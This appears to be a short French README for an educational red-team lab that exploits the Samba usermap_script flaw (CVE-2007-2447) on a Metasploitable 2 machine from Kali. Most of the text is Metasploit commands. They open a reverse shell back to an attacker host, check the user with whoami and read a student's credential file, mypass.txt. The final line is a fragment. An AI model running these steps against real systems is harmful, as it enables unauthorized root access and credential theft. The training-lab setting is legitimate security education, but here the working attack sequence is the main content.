
Laboratoire de test d'intrusion pas à pas exploitant Samba CVE-2007-2447 sur Metasploitable 2 avec Metasploit, démontrant la compromission root, le vol d'identifiants et l'exfiltration de données pour une formation red team éducative.
RedTeam-Test-d'Intrusion-SMB |
|
| Composant | Détails |
|---|---|
| Machine attaquante | Kali Linux |
| Machine victime | Metasploitable 2 |
| Port cible | 445 (Samba/SMB) |
| Exploit utilisé | exploit/multi/samba/usermap_script |
| Cible des identifiants | /redteam7/student3/mypass.txt |
msfconsole
Assurez-vous que la machine attaquante et la machine victime sont démarrées et en cours d'exécution.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Quitter le shell actuel
Ctrl C
exit
# Tuer tous les travaux en arrière-plan
sessions -K
jobs -K
# Redémarrer Metasploit
msfconsole
usermap_script sont hautement vulnérables.